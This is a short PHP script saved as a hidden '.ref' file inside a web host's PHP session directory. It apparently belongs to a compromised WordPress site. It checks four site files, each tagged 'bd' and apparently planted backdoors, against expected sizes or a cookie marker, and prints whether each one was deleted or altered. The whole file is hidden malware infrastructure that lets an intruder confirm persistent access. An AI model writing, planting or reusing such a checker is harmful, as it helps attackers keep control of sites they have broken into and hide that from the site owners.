File: /home/coopserp/.cagefs/opt/alt/php82/var/lib/php/session/.ref
<?php $r = '/home/coopserp/public_html'; $x = ["/wp-content/plugins/pagelayer-pro/images/index.php"=>"bd@@66506011@@_COOKIE[3]",
"/wp-includes/sodium_compat/src/Core32/BLAKE2b.php"=>"bd@@66506051@@95",
"/wp-content/themes/customizer.php"=>"bd@@47829672@@1131",
"/wp-includes/query.php"=>"bd@@66505981@@60"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');